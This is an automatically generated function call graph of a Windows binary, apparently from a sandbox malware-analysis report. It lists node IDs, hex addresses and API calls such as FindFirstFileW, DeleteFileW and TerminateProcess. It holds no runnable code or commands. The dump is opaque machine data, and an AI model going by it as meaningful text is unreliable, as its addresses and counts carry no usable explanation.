Mailbox 59 API calls 98483->98484 98485 a91236 98484->98485 98485->98429 98487 a914ce 98486->98487 98488 a91471 98486->98488 98490 a91981 59 API calls 98487->98490 98488->98487 98489 a9147c 98488->98489 98492 acf1de 98489->98492 98493 a91497 98489->98493 98491 a9149f _memmove 98490->98491 98491->98453 98521 a91c7e 98492->98521 98520 a91b7c 59 API calls Mailbox 98493->98520 98496 acf1e8 98497 aa0fe6 Mailbox 59 API calls 98496->98497 98498 acf208 98497->98498 98500 a9198f 98499->98500 98502 a91998 _memmove 98499->98502 98500->98502 98524 a91aa4 98500->98524 98502->98443 98504 a91aa4 59 API calls 98503->98504 98505 a91614 98504->98505 98505->98444 98505->98463 98507 a919fb 98506->98507 98509 a919ee 98506->98509 98508 aa0fe6 Mailbox 59 API calls 98507->98508 98508->98509 98509->98445 98511 a9189a 98510->98511 98512 a9182d __NMSG_WRITE 98510->98512 98513 a91981 59 API calls 98511->98513 98514 a91868 98512->98514 98515 a91843 98512->98515 98518 a9184b _memmove 98513->98518 98516 a91c7e 59 API calls 98514->98516 98528 a91b7c 59 API calls Mailbox 98515->98528 98516->98518 98518->98472 98519->98472 98520->98491 98522 aa0fe6 Mailbox 59 API calls 98521->98522 98523 a91c88 98522->98523 98523->98496 98525 a91ab7 98524->98525 98527 a91ab4 _memmove 98524->98527 98526 aa0fe6 Mailbox 59 API calls 98525->98526 98526->98527 98527->98502 98528->98518 98529->98346 98530->98354 98531->98360 98532->98372 98533->98376 98535 a9374f 98534->98535 98538 a9376a 98534->98538 98536 a91aa4 59 API calls 98535->98536 98537 a93757 CharUpperBuffW 98536->98537 98537->98538 98538->98252 98540 abd3cd 98539->98540 98541 a83aee 98539->98541 98542 aa0fe6 Mailbox 59 API calls 98541->98542 98543 a83af5 98542->98543 98544 a83b16 98543->98544 98666 a83ba5 59 API calls Mailbox 98543->98666 98544->98270 98547 ac359f 98546->98547 98559 a8bc95 98546->98559 98738 aea48d 89 API calls 4 library calls 98547->98738 98549 a8bf3b 98549->98270 98553 a8c2b6 98553->98549 98554 a8c2c3 98553->98554 98736 a8c483 277 API calls Mailbox 98554->98736 98555 a8bf25 Mailbox 98555->98549 98735 a8c460 10 API calls Mailbox 98555->98735 98558 a8c2ca LockWindowUpdate DestroyWindow GetMessageW 98558->98549 98560 a8c2fc 98558->98560 98586 a8bca5 Mailbox 98559->98586 98739 a85376 60 API calls 98559->98739 98740 ad700c 277 API calls 98559->98740 98562 ac4509 TranslateMessage DispatchMessageW GetMessageW 98560->98562 98561 ac36b3 Sleep 98561->98586 98562->98562 98563 ac4539 98562->98563 98563->98549 98564 a8bf54 timeGetTime 98564->98586 98565 ac405d WaitForSingleObject 98567 ac407d GetExitCodeProcess CloseHandle 98565->98567 98565->98586 98589 a8c36b 98567->98589 98568 a91c9c 59 API calls 98568->98586 98569 a91207 59 API calls 98592 a8c1fa Mailbox 98569->98592 98570 a8c210 Sleep 98570->98592 98571 aa0fe6 59 API calls Mailbox 98571->98586 98572 ac43a9 Sleep 98572->98592 98574 aa0859 timeGetTime 98574->98592 98575 a86cd8 255 API calls 98575->98586 98577 a8c324 timeGetTime 98737 a85376 60 API calls 98577->98737 98579 ae4148 66 API calls 98579->98592 98580 a84d37 84 API calls 98580->98586 98581 ac4440 GetExitCodeProcess 98582 ac446c CloseHandle 98581->98582 98583 ac4456 WaitForSingleObject 98581->98583 98582->98592 98583->98582 98583->98586 98584 b06562 110 API calls 98584->98592 98586->98555 98586->98561 98586->98564 98586->98565 98586->98568 98586->98570 98586->98571 98586->98572 98586->98575 98586->98577 98586->98580 98587 a86d79 109 API calls 98586->98587 98586->98589 98586->98592 98596 a85376 60 API calls 98586->98596 98601 a8c26d 98586->98601 98602 a8b020 255 API calls 98586->98602 98605 a91a36 59 API calls 98586->98605 98606 afc355 255 API calls 98586->98606 98608 a8a820 255 API calls 98586->98608 98609 a85190 59 API calls Mailbox 98586->98609 98610 a83ea3 68 API calls 98586->98610 98611 a853b0 255 API calls 98586->98611 98612 a83a40 59 API calls 98586->98612 98613 a839be 68 API calls 98586->98613 98614 aea48d 89 API calls 98586->98614 98615 ac3e13 VariantClear 98586->98615 98616 ad6cf1 59 API calls Mailbox 98586->98616 98617 ac3ea9 VariantClear 98586->98617 98618 ad7aad 59 API calls 98586->98618 98619 ac3c57 VariantClear 98586->98619 98620 a841c4 59 API calls Mailbox 98586->98620 98667 a852b0 98586->98667 98676 a89a00 98586->98676 98683 a89c80 98586->98683 98714 aec270 98586->98714 98721 afeedb 98586->98721 98729 afe620 98586->98729 98732 afe60c 98586->98732 98741 b06655 59 API calls 98586->98741 98742 aea058 59 API calls Mailbox 98586->98742 98743 ade0aa 59 API calls 98586->98743 98744 ad6c62 59 API calls 2 library calls 98586->98744 98745 a838ff 59 API calls 98586->98745 98587->98586 98589->98270 98590 ac38aa Sleep 98590->98586 98591 ac44c8 Sleep 98591->98586 98592->98569 98592->98570 98592->98574 98592->98579 98592->98581 98592->98584 98592->98586 98592->98589 98592->98590 98592->98591 98594 a91a36 59 API calls 98592->98594 98599 a83ea3 68 API calls 98592->98599 98746 ae2baf 60 API calls 98592->98746 98747 a85376 60 API calls 98592->98747 98748 a86cd8 277 API calls 98592->98748 98749 ad70e2 59 API calls 98592->98749 98750 ae57ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98592->98750 98594->98592 98596->98586 98599->98592 98604 a91a36 59 API calls 98601->98604 98602->98586 98604->98555 98605->98586 98606->98586 98608->98586 98609->98586 98610->98586 98611->98586 98612->98586 98613->98586 98614->98586 98615->98586 98616->98586 98617->98586 98618->98586 98619->98586 98620->98586 98626 abd3b1 98625->98626 98629 a83a53 98625->98629 98627 abd3c1 98626->98627 99070 ad6d17 59 API calls 98626->99070 98630 a83a7d 98629->98630 98631 a83a9a Mailbox 98629->98631 99061 a83b31 98629->99061 98633 a83a83 98630->98633 98634 a83b31 59 API calls 98630->98634 98631->98270 98633->98631 99069 a85190 59 API calls Mailbox 98633->99069 98634->98633 98636->98270 98637->98250 98638->98288 98639->98288 98640->98256 98641->98288 98642->98288 98643->98270 98644->98270 98645->98270 98646->98270 99072 a83c30 98647->99072 98649 a83eb3 98650 a83f2d 98649->98650 98651 a83ebd 98649->98651 98652 a8523c 59 API calls 98650->98652 98653 aa0fe6 Mailbox 59 API calls 98651->98653 98654 a83f1d 98652->98654 98655 a83ece 98653->98655 98654->98270 98656 a83edc 98655->98656 98657 a91207 59 API calls 98655->98657 98658 a83eeb 98656->98658 98659 a91bcc 59 API calls 98656->98659 98657->98656 98660 aa0fe6 Mailbox 59 API calls 98658->98660 98659->98658 98661 a83ef5 98660->98661 99079 a83bc8 68 API calls 98661->99079 98663->98288 98664->98270 98665->98288 98666->98544 98668 a85313 98667->98668 98669 a852c6 98667->98669 98671 a852ec 98668->98671 98673 abdf68 TranslateAcceleratorW 98668->98673 98674 a8533e PeekMessageW 98668->98674 98675 a85352 TranslateMessage DispatchMessageW 98668->98675 98751 a8359e 98668->98751 98669->98668 98670 a852d3 PeekMessageW 98669->98670 98670->98668 98670->98671 98671->98586 98673->98668 98673->98674 98674->98668 98674->98671 98675->98674 98677 a89a1d 98676->98677 98678 a89a31 98676->98678 98756 a894e0 98677->98756 98790 aea48d 89 API calls 4 library calls 98678->98790 98680 a89a28 98680->98586 98682 ac2478 98682->98682 98684 a89cb5 98683->98684 98685 ac247d 98684->98685 98687 a89d1f 98684->98687 98688 a89d79 98684->98688 98686 a853b0 277 API calls 98685->98686 98689 ac2492 98686->98689 98687->98688 98691 a91207 59 API calls 98687->98691 98690 a91207 59 API calls 98688->98690 98694 aa2f70 __cinit 67 API calls 98688->98694 98696 ac24fa 98688->98696 98700 a89f3a 98688->98700 98713 a89f50 Mailbox 98688->98713 98689->98713 98811 aea48d 89 API calls 4 library calls 98689->98811 98690->98688 98693 ac24d8 98691->98693 98695 aa2f70 __cinit 67 API calls 98693->98695 98694->98688 98695->98688 98696->98586 98697 a839be 68 API calls 98697->98713 98698 a853b0 277 API calls 98698->98713 98700->98713 98812 aea48d 89 API calls 4 library calls 98700->98812 98701 aea48d 89 API calls 98701->98713 98702 a8a775 98816 aea48d 89 API calls 4 library calls 98702->98816 98706 ac27f9 98706->98586 98707 a84230 59 API calls 98707->98713 98712 a8a058 98712->98586 98713->98697 98713->98698 98713->98701 98713->98702 98713->98707 98713->98712 98807 a91bcc 98713->98807 98813 ad7aad 59 API calls 98713->98813 98814 afccac 277 API calls 98713->98814 98815 afbc26 277 API calls Mailbox 98713->98815 98817 a85190 59 API calls Mailbox 98713->98817 98818 af9ab0 277 API calls Mailbox 98713->98818 98715 a84d37 84 API calls 98714->98715 98716 aec286 98715->98716 98819 ae4005 98716->98819 98718 aec28e 98719 aec292 GetLastError 98718->98719 98720 aec2a7 98718->98720 98719->98720 98720->98586 98723 afef1e 98721->98723 98728 afeef7 98721->98728 98722 afef40 98726 afef84 98722->98726 98722->98728 98909 a8502b 59 API calls 98722->98909 98723->98722 98908 a8502b 59 API calls 98723->98908 98875 ae6818 98726->98875 98728->98586 98950 afd1c6 98729->98950 98731 afe630 98731->98586 98733 afd1c6 130 API calls 98732->98733 98734 afe61c 98733->98734 98734->98586 98735->98553 98736->98558 98737->98586 98738->98559 98739->98559 98740->98559 98741->98586 98742->98586 98743->98586 98744->98586 98745->98586 98746->98592 98747->98592 98748->98592 98749->98592 98750->98592 98752 a835e2 98751->98752 98753 a835b0 98751->98753 98752->98668 98753->98752 98754 a835d5 IsDialogMessageW 98753->98754 98755 abd273 GetClassLongW 98753->98755 98754->98752 98754->98753 98755->98753 98755->98754 98757 a853b0 277 API calls 98756->98757 98758 a8951f 98757->98758 98759 ac2001 98758->98759 98775 a89527 _memmove 98758->98775 98799 a85190 59 API calls Mailbox 98759->98799 98761 ac22c0 98805 aea48d 89 API calls 4 library calls 98761->98805 98763 ac22de 98763->98763 98764 a89583 98764->98680 98765 a89944 98767 aa0fe6 Mailbox 59 API calls 98765->98767 98766 a8986a 98769 a8987f 98766->98769 98770 ac22b1 98766->98770 98774 a896e3 _memmove 98767->98774 98768 aa0fe6 59 API calls Mailbox 98768->98775 98772 aa0fe6 Mailbox 59 API calls 98769->98772 98804 afa983 59 API calls 98770->98804 98771 a89741 98771->98766 98780 ac22a0 98771->98780 98784 a8977d 98771->98784 98786 ac2278 98771->98786 98788 ac2253 98771->98788 98800 a88180 277 API calls 98771->98800 98772->98784 98774->98771 98776 a8970e 98774->98776 98778 aa0fe6 Mailbox 59 API calls 98774->98778 98775->98761 98775->98764 98775->98765 98775->98768 98775->98771 98777 a896cf 98775->98777 98776->98771 98791 a8cca0 98776->98791 98777->98765 98779 a896dc 98777->98779 98778->98776 98781 aa0fe6 Mailbox 59 API calls 98779->98781 98803 aea48d 89 API calls 4 library calls 98780->98803 98781->98774 98784->98680 98802 aea48d 89 API calls 4 library calls 98786->98802 98801 aea48d 89 API calls 4 library calls 98788->98801 98790->98682 98792 a8ccda 98791->98792 98793 a8cd02 98791->98793 98794 a89c80 277 API calls 98792->98794 98797 a8cce0 98792->98797 98795 ac4971 98793->98795 98796 a853b0 277 API calls 98793->98796 98793->98797 98794->98797 98795->98797 98806 aea48d 89 API calls 4 library calls 98795->98806 98796->98795 98797->98771 98797->98797 98799->98765 98800->98771 98801->98784 98802->98784 98803->98784 98804->98761 98805->98763 98806->98797 98808 a91bef _memmove 98807->98808 98809 a91bdc 98807->98809 98808->98713 98809->98808 98810 aa0fe6 Mailbox 59 API calls 98809->98810 98810->98808 98811->98713 98812->98713 98813->98713 98814->98713 98815->98713 98816->98706 98817->98713 98818->98713 98820 a91207 59 API calls 98819->98820 98821 ae4024 98820->98821 98822 a91207 59 API calls 98821->98822 98823 ae402d 98822->98823 98824 a91207 59 API calls 98823->98824 98825 ae4036 98824->98825 98844 aa0284 98825->98844 98830 ae405c 98832 aa0119 59 API calls 98830->98832 98833 ae4070 FindFirstFileW 98832->98833 98834 ae408f 98833->98834 98835 ae40fc FindClose 98833->98835 98834->98835 98838 ae4093 98834->98838 98840 ae4107 Mailbox 98835->98840 98836 ae40d7 FindNextFileW 98836->98834 98836->98838 98837 a91c9c 59 API calls 98837->98838 98838->98834 98838->98836 98838->98837 98841 a91900 59 API calls 98838->98841 98863 a917e0 59 API calls Mailbox 98838->98863 98840->98718 98842 ae40c8 DeleteFileW 98841->98842 98842->98836 98843 ae40f3 FindClose 98842->98843 98843->98840 98864 ab1b70 98844->98864 98847 aa02cd 98849 a919e1 59 API calls 98847->98849 98848 aa02b0 98850 a91821 59 API calls 98848->98850 98851 aa02bc 98849->98851 98850->98851 98866 a9133d 98851->98866 98854 ae4fec GetFileAttributesW 98855 ae404a 98854->98855 98855->98830 98856 a91900 98855->98856 98857 acf534 98856->98857 98858 a91914 98856->98858 98860 a91c7e 59 API calls 98857->98860 98870 a918a5 98858->98870 98862 acf53f __NMSG_WRITE _memmove 98860->98862 98861 a9191f 98861->98830 98863->98838 98865 aa0291 GetFullPathNameW 98864->98865 98865->98847 98865->98848 98867 a9134b 98866->98867 98868 a91981 59 API calls 98867->98868 98869 a9135b 98868->98869 98869->98854 98871 a918b4 __NMSG_WRITE 98870->98871 98872 a91c7e 59 API calls 98871->98872 98873 a918c5 _memmove 98871->98873 98874 acf4f1 _memmove 98872->98874 98873->98861 98910 ae6735 98875->98910 98877 ae683d _memmove 98877->98728 98879 ae6899 98926 ae6a73 89 API calls 2 library calls 98879->98926 98880 ae68b1 98882 ae6921 98880->98882 98885 ae6917 98880->98885 98887 ae68ca 98880->98887 98882->98877 98883 ae699f 98882->98883 98884 ae6951 98882->98884 98886 ae69a6 98883->98886 98894 ae6a3a 98883->98894 98890 ae6956 98884->98890 98893 ae6971 98884->98893 98885->98882 98892 ae68fe 98885->98892 98888 ae6a1c 98886->98888 98889 ae69a9 98886->98889 98927 ae8cd0 61 API calls 98887->98927 98888->98877 98934 a850d5 59 API calls 98888->98934 98897 ae69ad 98889->98897 98898 ae69e5 98889->98898 98890->98877 98930 a85087 59 API calls 98890->98930 98917 ae7c7f 98892->98917 98893->98877 98931 a85087 59 API calls 98893->98931 98894->98877 98935 a850d5 59 API calls 98894->98935 98897->98877 98932 a850d5 59 API calls 98897->98932 98898->98877 98933 a850d5 59 API calls 98898->98933 98904 ae68d2 98928 ae8cd0 61 API calls 98904->98928 98906 ae68e9 _memmove 98929 ae8cd0 61 API calls 98906->98929 98908->98722 98909->98726 98911 ae6785 98910->98911 98915 ae6746 98910->98915 98946 a8502b 59 API calls 98911->98946 98912 ae6783 98912->98877 98912->98879 98912->98880 98914 a84d37 84 API calls 98914->98915 98915->98912 98915->98914 98936 aa312d 98915->98936 98918 ae7c8a 98917->98918 98919 aa0fe6 Mailbox 59 API calls 98918->98919 98920 ae7c91 98919->98920 98921 ae7cbe 98920->98921 98922 ae7c9d 98920->98922 98924 aa0fe6 Mailbox 59 API calls 98921->98924 98923 aa0fe6 Mailbox 59 API calls 98922->98923 98925 ae7ca6 _memset 98923->98925 98924->98925 98925->98877 98926->98877 98927->98904 98928->98906 98929->98892 98930->98877 98931->98877 98932->98877 98933->98877 98934->98877 98935->98877 98937 aa3139 98936->98937 98938 aa31ae 98936->98938 98945 aa315e 98937->98945 98947 aa8d58 58 API calls __getptd_noexit 98937->98947 98949 aa31c0 60 API calls 3 library calls 98938->98949 98940 aa31bb 98940->98915 98942 aa3145 98948 aa8fe6 9 API calls __vswprintf_l 98942->98948 98944 aa3150 98944->98915 98945->98915 98946->98912 98947->98942 98948->98944 98949->98940 98951 a84d37 84 API calls 98950->98951 98952 afd203 98951->98952 98955 afd24a Mailbox 98952->98955 98988 afde8e 98952->98988 98954 afd29b Mailbox 98954->98955 98961 a84d37 84 API calls 98954->98961 98975 afd4a2 98954->98975 99021 aefc0d 59 API calls 2 library calls 98954->99021 99022 afd6c8 61 API calls 2 library calls 98954->99022 98955->98731 98956 afd617 99038 afdfb1 92 API calls Mailbox 98956->99038 98959 afd626 98960 afd4b0 98959->98960 98963 afd632 98959->98963 99001 afd057 98960->99001 98961->98954 98963->98955 98967 afd4e9 99016 aa0e38 98967->99016 98970 afd51c 99024 a847be 98970->99024 98971 afd503 99023 aea48d 89 API calls 4 library calls 98971->99023 98974 afd50e GetCurrentProcess TerminateProcess 98974->98970 98975->98956 98975->98960 98980 afd68d 98980->98955 98984 afd6a1 FreeLibrary 98980->98984 98981 afd554 99036 afdd32 107 API calls _free 98981->99036 98984->98955 98986 a8523c 59 API calls 98987 afd565 98986->98987 98987->98980 98987->98986 99037 a84230 59 API calls Mailbox 98987->99037 99039 afdd32 107 API calls _free 98987->99039 98989 a91aa4 59 API calls 98988->98989 98990 afdea9 CharLowerBuffW 98989->98990 99040 adf903 98990->99040 98994 a91207 59 API calls 98995 afdee2 98994->98995 98996 a91462 59 API calls 98995->98996 98997 afdef9 98996->98997 98998 a91981 59 API calls 98997->98998 98999 afdf05 Mailbox 98998->98999 99000 afdf41 Mailbox 98999->99000 99047 afd6c8 61 API calls 2 library calls 98999->99047 99000->98954 99002 afd072 99001->99002 99006 afd0c7 99001->99006 99003 aa0fe6 Mailbox 59 API calls 99002->99003 99005 afd094 99003->99005 99004 aa0fe6 Mailbox 59 API calls 99004->99005 99005->99004 99005->99006 99007 afe139 99006->99007 99008 afe362 Mailbox 99007->99008 99015 afe15c _strcat _wcscpy __NMSG_WRITE 99007->99015 99008->98967 99009 a8502b 59 API calls 99009->99015 99010 a850d5 59 API calls 99010->99015 99011 a85087 59 API calls 99011->99015 99012 a84d37 84 API calls 99012->99015 99013 aa593c 58 API calls __malloc_crt 99013->99015 99015->99008 99015->99009 99015->99010 99015->99011 99015->99012 99015->99013 99050 ae5e42 61 API calls 2 library calls 99015->99050 99017 aa0e4d 99016->99017 99018 aa0ee5 LoadLibraryExW 99017->99018 99019 aa0ed3 FindCloseChangeNotification 99017->99019 99020 aa0eb3 99017->99020 99018->99020 99019->99020 99020->98970 99020->98971 99021->98954 99022->98954 99023->98974 99025 a847c6 99024->99025 99026 aa0fe6 Mailbox 59 API calls 99025->99026 99027 a847d4 99026->99027 99028 a847e0 99027->99028 99051 a846ec 59 API calls Mailbox 99027->99051 99030 a84540 99028->99030 99052 a84650 99030->99052 99032 a8454f 99033 aa0fe6 Mailbox 59 API calls 99032->99033 99034 a845eb 99032->99034 99033->99034 99034->98987 99035 a84230 59 API calls Mailbox 99034->99035 99035->98981 99036->98987 99037->98987 99038->98959 99039->98987 99042 adf92e __NMSG_WRITE 99040->99042 99041 adf96d 99041->98994 99041->98999 99042->99041 99045 adf963 99042->99045 99046 adfa14 99042->99046 99045->99041 99048 a914db 61 API calls 99045->99048 99046->99041 99049 a914db 61 API calls 99046->99049 99047->99000 99048->99045 99049->99046 99050->99015 99051->99028 99053 a84659 Mailbox 99052->99053 99054 abd6ec 99053->99054 99059 a84663 99053->99059 99056 aa0fe6 Mailbox 59 API calls 99054->99056 99055 a8466a 99055->99032 99057 abd6f8 99056->99057 99059->99055 99060 a85190 59 API calls Mailbox 99059->99060 99060->99059 99062 a83b3f 99061->99062 99067 a83b67 99061->99067 99063 a83b4d 99062->99063 99064 a83b31 59 API calls 99062->99064 99065 a83b53 99063->99065 99066 a83b31 59 API calls 99063->99066 99064->99063 99065->99067 99071 a85190 59 API calls Mailbox 99065->99071 99066->99065 99067->98630 99069->98631 99070->98627 99071->99067 99073 a83e11 99072->99073 99074 a83c43 99072->99074 99073->98649 99075 a91207 59 API calls 99074->99075 99078 a83c54 99074->99078 99076 a83e73 99075->99076 99077 aa2f70 __cinit 67 API calls 99076->99077 99077->99078 99078->98649 99079->98654 99080->98294 99081->98295 99082->98194 99083->98189 99084->98190 99085->98189 99086->98186 99088 aa59b7 99087->99088 99096 aa5948 99087->99096 99113 aa35d1 DecodePointer 99088->99113 99090 aa59bd 99114 aa8d58 58 API calls __getptd_noexit 99090->99114 99093 aa597b RtlAllocateHeap 99093->99096 99103 aa59af 99093->99103 99095 aa59a3 99111 aa8d58 58 API calls __getptd_noexit 99095->99111 99096->99093 99096->99095 99100 aa59a1 99096->99100 99101 aa5953 99096->99101 99110 aa35d1 DecodePointer 99096->99110 99112 aa8d58 58 API calls __getptd_noexit 99100->99112 99101->99096 99107 aaa39b 58 API calls __NMSG_WRITE 99101->99107 99108 aaa3f8 58 API calls 4 library calls 99101->99108 99109 aa32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99101->99109 99103->98198 99104->98198 99105->98202 99106->98204 99107->99101 99108->99101 99110->99096 99111->99100 99112->99103 99113->99090 99114->99103 99116 aa2e80 __setmode 99115->99116 99123 aa3447 99116->99123 99122 aa2ea7 __setmode 99122->98102 99140 aa9e3b 99123->99140 99125 aa2e89 99126 aa2eb8 DecodePointer DecodePointer 99125->99126 99127 aa2e95 99126->99127 99128 aa2ee5 99126->99128 99137 aa2eb2 99127->99137 99128->99127 99186 aa89d4 59 API calls __vswprintf_l 99128->99186 99130 aa2f48 EncodePointer EncodePointer 99130->99127 99131 aa2f1c 99131->99127 99135 aa2f36 EncodePointer 99131->99135 99188 aa8a94 61 API calls 2 library calls 99131->99188 99132 aa2ef7 99132->99130 99132->99131 99187 aa8a94 61 API calls 2 library calls 99132->99187 99135->99130 99136 aa2f30 99136->99127 99136->99135 99189 aa3450 99137->99189 99141 aa9e5f EnterCriticalSection 99140->99141 99142 aa9e4c 99140->99142 99141->99125 99147 aa9ec3 99142->99147 99144 aa9e52 99144->99141 99171 aa32e5 58 API calls 3 library calls 99144->99171 99148 aa9ecf __setmode 99147->99148 99149 aa9ed8 99148->99149 99150 aa9ef0 99148->99150 99172 aaa39b 58 API calls __NMSG_WRITE 99149->99172 99162 aa9f11 __setmode 99150->99162 99175 aa8a4d 58 API calls __malloc_crt 99150->99175 99152 aa9edd 99173 aaa3f8 58 API calls 4 library calls 99152->99173 99155 aa9f05 99157 aa9f1b 99155->99157 99158 aa9f0c 99155->99158 99156 aa9ee4 99174 aa32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99156->99174 99159 aa9e3b __lock 58 API calls 99157->99159 99176 aa8d58 58 API calls __getptd_noexit 99158->99176 99163 aa9f22 99159->99163 99162->99144 99165 aa9f2f 99163->99165 99166 aa9f47 99163->99166 99177 aaa05b InitializeCriticalSectionAndSpinCount 99165->99177 99178 aa2f85 99166->99178 99169 aa9f3b 99184 aa9f63 LeaveCriticalSection _doexit 99169->99184 99172->99152 99173->99156 99175->99155 99176->99162 99177->99169 99179 aa2fb7 _free 99178->99179 99180 aa2f8e RtlFreeHeap 99178->99180 99179->99169 99180->99179 99181 aa2fa3 99180->99181 99185 aa8d58 58 API calls __getptd_noexit 99181->99185 99183 aa2fa9 GetLastError 99183->99179 99184->99162 99185->99183 99186->99132 99187->99131 99188->99136 99192 aa9fa5 LeaveCriticalSection 99189->99192 99191 aa2eb7 99191->99122 99192->99191 99193 a89b8b 99194 a886e0 277 API calls 99193->99194 99195 a89b99 99194->99195 99196 a89a6c 99199 a8829c 99196->99199 99198 a89a78 99200 a88308 99199->99200 99201 a882b4 99199->99201 99205 a88331 99200->99205 99208 aea48d 89 API calls 4 library calls 99200->99208 99201->99200 99202 a853b0 277 API calls 99201->99202 99206 a882eb 99202->99206 99204 ac0ed8 99204->99204 99205->99198 99206->99205 99207 a8523c 59 API calls 99206->99207 99207->99200 99208->99204 99209 ae92c8 99210 ae92db 99209->99210 99211 ae92d5 99209->99211 99213 aa2f85 _free 58 API calls 99210->99213 99214 ae92ec 99210->99214 99212 aa2f85 _free 58 API calls 99211->99212 99212->99210 99213->99214 99215 aa2f85 _free 58 API calls 99214->99215 99216 ae92fe 99214->99216 99215->99216 99217 abe463 99229 a8373a 99217->99229 99219 abe479 99220 abe4fa 99219->99220 99221 abe48f 99219->99221 99223 a8b020 277 API calls 99220->99223 99238 a85376 60 API calls 99221->99238 99224 abe4ee Mailbox 99223->99224 99228 abf046 Mailbox 99224->99228 99240 aea48d 89 API calls 4 library calls 99224->99240 99226 abe4ce 99226->99224 99239 ae890a 59 API calls Mailbox 99226->99239 99230 a83758 99229->99230 99231 a83746 99229->99231 99233 a8375e 99230->99233 99234 a83787 99230->99234 99232 a8523c 59 API calls 99231->99232 99237 a83750 99232->99237 99235 aa0fe6 Mailbox 59 API calls 99233->99235 99236 a8523c 59 API calls 99234->99236 99235->99237 99236->99237 99237->99219 99238->99226 99239->99224 99240->99228 99241 aa7e83 99242 aa7e8f __setmode 99241->99242 99278 aaa038 GetStartupInfoW 99242->99278 99244 aa7e94 99280 aa8dac GetProcessHeap 99244->99280 99246 aa7eec 99247 aa7ef7 99246->99247 99363 aa7fd3 58 API calls 3 library calls 99246->99363 99281 aa9d16 99247->99281 99250 aa7efd 99251 aa7f08 __RTC_Initialize 99250->99251 99364 aa7fd3 58 API calls 3 library calls 99250->99364 99302 aad802 99251->99302 99254 aa7f17 99255 aa7f23 GetCommandLineW 99254->99255 99365 aa7fd3 58 API calls 3 library calls 99254->99365 99321 ab5153 GetEnvironmentStringsW 99255->99321 99258 aa7f22 99258->99255 99261 aa7f3d 99262 aa7f48 99261->99262 99366 aa32e5 58 API calls 3 library calls 99261->99366 99331 ab4f88 99262->99331 99265 aa7f4e 99266 aa7f59 99265->99266 99367 aa32e5 58 API calls 3 library calls 99265->99367 99345 aa331f 99266->99345 99269 aa7f61 99270 aa7f6c __wwincmdln 99269->99270 99368 aa32e5 58 API calls 3 library calls 99269->99368 99351 a95f8b 99270->99351 99273 aa7f80 99274 aa7f8f 99273->99274 99369 aa3588 58 API calls _doexit 99273->99369 99370 aa3310 58 API calls _doexit 99274->99370 99277 aa7f94 __setmode 99279 aaa04e 99278->99279 99279->99244 99280->99246 99371 aa33b7 36 API calls 2 library calls 99281->99371 99283 aa9d1b 99372 aa9f6c InitializeCriticalSectionAndSpinCount __mtinitlocknum 99283->99372 99285 aa9d20 99286 aa9d24 99285->99286 99374 aa9fba TlsAlloc 99285->99374 99373 aa9d8c 61 API calls 2 library calls 99286->99373 99289 aa9d29 99289->99250 99290 aa9d36 99290->99286 99291 aa9d41 99290->99291 99375 aa8a05 99291->99375 99294 aa9d83 99383 aa9d8c 61 API calls 2 library calls 99294->99383 99297 aa9d62 99297->99294 99299 aa9d68 99297->99299 99298 aa9d88 99298->99250 99382 aa9c63 58 API calls 4 library calls 99299->99382 99301 aa9d70 GetCurrentThreadId 99301->99250 99303 aad80e __setmode 99302->99303 99304 aa9e3b __lock 58 API calls 99303->99304 99305 aad815 99304->99305 99306 aa8a05 __calloc_crt 58 API calls 99305->99306 99307 aad826 99306->99307 99308 aad891 GetStartupInfoW 99307->99308 99309 aad831 @_EH4_CallFilterFunc@8 __setmode 99307->99309 99315 aad8a6 99308->99315 99316 aad9d5 99308->99316 99309->99254 99310 aada9d 99397 aadaad LeaveCriticalSection _doexit 99310->99397 99312 aa8a05 __calloc_crt 58 API calls 99312->99315 99313 aada22 GetStdHandle 99313->99316 99314 aada35 GetFileType 99314->99316 99315->99312 99315->99316 99318 aad8f4 99315->99318 99316->99310 99316->99313 99316->99314 99396 aaa05b InitializeCriticalSectionAndSpinCount 99316->99396 99317 aad928 GetFileType 99317->99318 99318->99316 99318->99317 99395 aaa05b InitializeCriticalSectionAndSpinCount 99318->99395 99322 aa7f33 99321->99322 99323 ab5164 99321->99323 99327 ab4d4b GetModuleFileNameW 99322->99327 99323->99323 99398 aa8a4d 58 API calls __malloc_crt 99323->99398 99325 ab518a _memmove 99326 ab51a0 FreeEnvironmentStringsW 99325->99326 99326->99322 99328 ab4d7f _wparse_cmdline 99327->99328 99330 ab4dbf _wparse_cmdline 99328->99330 99399 aa8a4d 58 API calls __malloc_crt 99328->99399 99330->99261 99332 ab4f99 99331->99332 99334 ab4fa1 __NMSG_WRITE 99331->99334 99332->99265 99333 aa8a05 __calloc_crt 58 API calls 99341 ab4fca __NMSG_WRITE 99333->99341 99334->99333 99335 ab5021 99336 aa2f85 _free 58 API calls 99335->99336 99336->99332 99337 aa8a05 __calloc_crt 58 API calls 99337->99341 99338 ab5046 99339 aa2f85 _free 58 API calls 99338->99339 99339->99332 99341->99332 99341->99335 99341->99337 99341->99338 99342 ab505d 99341->99342 99400 ab4837 58 API calls __vswprintf_l 99341->99400 99401 aa8ff6 IsProcessorFeaturePresent 99342->99401 99344 ab5069 99344->99265 99347 aa332b __IsNonwritableInCurrentImage 99345->99347 99424 aaa701 99347->99424 99348 aa3349 __initterm_e 99349 aa2f70 __cinit 67 API calls 99348->99349 99350 aa3368 __cinit __IsNonwritableInCurrentImage 99348->99350 99349->99350 99350->99269 99352 a95fa5 99351->99352 99353 a96044 99351->99353 99354 a95fdf IsThemeActive 99352->99354 99353->99273 99427 aa359c 99354->99427 99358 a9600b 99439 a95f00 SystemParametersInfoW SystemParametersInfoW 99358->99439 99360 a96017 99440 a95240 99360->99440 99362 a9601f SystemParametersInfoW 99362->99353 99363->99247 99364->99251 99365->99258 99369->99274 99370->99277 99371->99283 99372->99285 99373->99289 99374->99290 99377 aa8a0c 99375->99377 99378 aa8a47 99377->99378 99380 aa8a2a 99377->99380 99384 ab5426 99377->99384 99378->99294 99381 aaa016 TlsSetValue 99378->99381 99380->99377 99380->99378 99392 aaa362 Sleep 99380->99392 99381->99297 99382->99301 99383->99298 99385 ab5431 99384->99385 99389 ab544c 99384->99389 99386 ab543d 99385->99386 99385->99389 99393 aa8d58 58 API calls __getptd_noexit 99386->99393 99387 ab545c RtlAllocateHeap 99387->99389 99390 ab5442 99387->99390 99389->99387 99389->99390 99394 aa35d1 DecodePointer 99389->99394 99390->99377 99392->99380 99393->99390 99394->99389 99395->99318 99396->99316 99397->99309 99398->99325 99399->99330 